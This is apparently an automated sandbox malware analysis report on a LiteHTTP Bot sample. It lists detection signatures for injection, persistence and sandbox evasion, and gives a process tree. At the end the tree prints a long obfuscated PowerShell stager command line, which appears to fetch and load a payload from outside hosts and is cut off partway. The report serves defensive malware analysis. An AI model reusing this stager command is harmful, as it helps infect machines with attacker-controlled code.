Edit tour
Windows
Analysis Report
3lhrJ4X.exe
Overview
General Information
Detection
LiteHTTP Bot
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Malicious sample detected (through community Yara rule)
Sigma detected: Powershell download and load assembly
Sigma detected: Powershell download payload from hardcoded c2 list
Suricata IDS alerts for network traffic
Yara detected LiteHTTP Bot
Yara detected Powershell download and execute
.NET source code references suspicious native API functions
AI detected suspicious sample
Found strings related to Crypto-Mining
Found suspicious powershell code related to unpacking or dynamic code loading
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Protects its processes via BreakOnTermination flag
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Silenttrinity Stager Msbuild Activity
Sigma detected: Suspicious Script Execution From Temp Folder
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Uses attrib.exe to hide files
Uses cmd line tools excessively to alter registry or file data
Uses schtasks.exe or at.exe to add and modify task schedules
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Contains functionality to dynamically determine API calls
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain checking for process token information
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains executable resources (Code or Archives)
PE file contains strange resources
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Startup Folder File Write
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores files to the Windows start menu directory
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match
Classification
- System is w10x64
- 3lhrJ4X.exe (PID: 7680 cmdline:
"C:\Users\ user\Deskt op\3lhrJ4X .exe" MD5: 21B5E69AEC540EAACE5AA6D588896218) - cmd.exe (PID: 7708 cmdline:
cmd.exe /c 67784c482 26c6.vbs MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 7716 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - wscript.exe (PID: 7784 cmdline:
"C:\Window s\System32 \WScript.e xe" "C:\Us ers\user\A ppData\Loc al\Temp\IX P000.TMP\6 7784c48226 c6.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80) - powershell.exe (PID: 7840 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" "$dosigo = 'WwBO$GU$ d$$u$FM$ZQ By$HY$aQBj $GU$U$Bv$G k$bgB0$E0$ YQBu$GE$Zw Bl$HI$XQ$6 $Do$UwBl$G M$dQBy$Gk$ d$B5$F$$cg Bv$HQ$bwBj $G8$b$$g$D 0$I$Bb$E4$ ZQB0$C4$Uw Bl$GM$dQBy $Gk$d$B5$F $$cgBv$HQ$ bwBj$G8$b$ BU$Hk$c$Bl $F0$Og$6$F Q$b$Bz$DE$ Mg$N$$o$I$ $g$C$$I$$g $C$$I$$g$C $$I$$g$C$$ ZgB1$G4$Yw B0$Gk$bwBu $C$$R$Bv$H c$bgBs$G8$ YQBk$EQ$YQ B0$GE$RgBy $G8$bQBM$G k$bgBr$HM$ I$B7$C$$c$ Bh$HI$YQBt $C$$K$Bb$H M$d$By$Gk$ bgBn$Fs$XQ Bd$CQ$b$Bp $G4$awBz$C k$I$$N$$o$ I$$g$C$$I$ $g$C$$I$$g $C$$I$$g$C $$J$B3$GU$ YgBD$Gw$aQ Bl$G4$d$$g $D0$I$BO$G U$dw$t$E8$ YgBq$GU$Yw B0$C$$UwB5 $HM$d$Bl$G 0$LgBO$GU$ d$$u$Fc$ZQ Bi$EM$b$Bp $GU$bgB0$D s$I$$N$$o$ I$$g$C$$I$ $g$C$$I$$g $C$$I$$g$C $$J$Bz$Gg$ dQBm$GY$b$ Bl$GQ$T$Bp $G4$awBz$C $$PQ$g$Ec$ ZQB0$C0$Ug Bh$G4$Z$Bv $G0$I$$t$E k$bgBw$HU$ d$BP$GI$ag Bl$GM$d$$g $CQ$b$Bp$G 4$awBz$C$$ LQBD$G8$dQ Bu$HQ$I$$k $Gw$aQBu$G s$cw$u$Ew$ ZQBu$Gc$d$ Bo$Ds$I$$N $$o$I$$g$C $$I$$g$C$$ I$$g$C$$I$ $g$C$$ZgBv $HI$ZQBh$G M$a$$g$Cg$ J$Bs$Gk$bg Br$C$$aQBu $C$$J$Bz$G g$dQBm$GY$ b$Bl$GQ$T$ Bp$G4$awBz $Ck$I$B7$C $$d$By$Hk$ I$B7$C$$cg Bl$HQ$dQBy $G4$I$$k$H c$ZQBi$EM$ b$Bp$GU$bg B0$C4$R$Bv $Hc$bgBs$G 8$YQBk$EQ$ YQB0$GE$K$ $k$Gw$aQBu $Gs$KQ$g$H 0$I$Bj$GE$ d$Bj$Gg$I$ B7$C$$YwBv $G4$d$Bp$G 4$dQBl$C$$ fQ$g$H0$Ow $g$$0$Cg$g $C$$I$$g$C $$I$$g$C$$ I$$g$C$$I$ By$GU$d$B1 $HI$bg$g$C Q$bgB1$Gw$ b$$g$H0$Ow $g$$0$Cg$g $C$$I$$g$C $$I$$g$C$$ I$$g$C$$I$ $k$Gw$aQBu $Gs$cw$g$D 0$I$B$$Cg$ JwBo$HQ$d$ Bw$HM$Og$v $C8$YgBp$H Q$YgB1$GM$ awBl$HQ$Lg Bv$HI$Zw$v $Gc$a$Bq$G s$awBr$Gs$ awBr$Gs$aw $v$HQ$Z$By $GQ$cgBl$G U$cwB0$C8$ Z$Bv$Hc$bg Bs$G8$YQBk $HM$LwBp$G 0$Zw$u$Go$ c$Bn$D8$NQ $z$Dc$Ng$x $DI$Jw$s$C $$JwBo$HQ$ d$Bw$HM$Og $v$C8$cgBh $Hc$LgBn$G k$d$Bo$HU$ YgB1$HM$ZQ By$GM$bwBu $HQ$ZQBu$H Q$LgBj$G8$ bQ$v$Gc$bQ Bl$GQ$dQBz $GE$MQ$z$D U$LwBu$GE$ bgBv$C8$cg Bl$GY$cw$v $Gg$ZQBh$G Q$cw$v$G0$ YQBp$G4$Lw Bu$GU$dwBf $Gk$bQBn$D E$Mg$z$C4$ agBw$Gc$Jw $p$Ds$DQ$K $C$$I$$g$C $$I$$g$C$$ I$$g$C$$I$ $g$C$$J$Bp $G0$YQBn$G U$QgB5$HQ$ ZQBz$C$$PQ $g$EQ$bwB3 $G4$b$Bv$G E$Z$BE$GE$ d$Bh$EY$cg Bv$G0$T$Bp $G4$awBz$C $$J$Bs$Gk$ bgBr$HM$Ow $N$$o$I$$g $C$$I$$g$C $$I$$g$C$$ I$$g$C$$I$ Bp$GY$I$$o $CQ$aQBt$G E$ZwBl$EI$ eQB0$GU$cw $g$C0$bgBl $C$$J$Bu$H U$b$Bs$Ck$ I$B7$C$$J$ Bp$G0$YQBn $GU$V$Bl$H g$d$$g$D0$ I$Bb$FM$eQ Bz$HQ$ZQBt $C4$V$Bl$H g$d$$u$EU$ bgBj$G8$Z$ Bp$G4$ZwBd $Do$OgBV$F Q$Rg$4$C4$ RwBl$HQ$Uw B0$HI$aQBu $Gc$K$$k$G k$bQBh$Gc$ ZQBC$Hk$d$ Bl$HM$KQ$7 $$0$Cg$g$C $$I$$g$C$$ I$$g$C$$I$ $g$C$$I$$g $CQ$cwB0$G E$cgB0$EY$ b$Bh$Gc$I$ $9$C$$Jw$8 $Dw$QgBB$F M$RQ$2$DQ$ XwBT$FQ$QQ BS$FQ$Pg$+ $Cc$Ow$g$C Q$ZQBu$GQ$ RgBs$GE$Zw $g$D0$I$$n $Dw$P$BC$E E$UwBF$DY$ N$Bf$EU$Tg BE$D4$Pg$n $Ds$I$$k$H M$d$Bh$HI$ d$BJ$G4$Z$ Bl$Hg$I$$9 $C$$J$Bp$G 0$YQBn$GU$ V$Bl$Hg$d$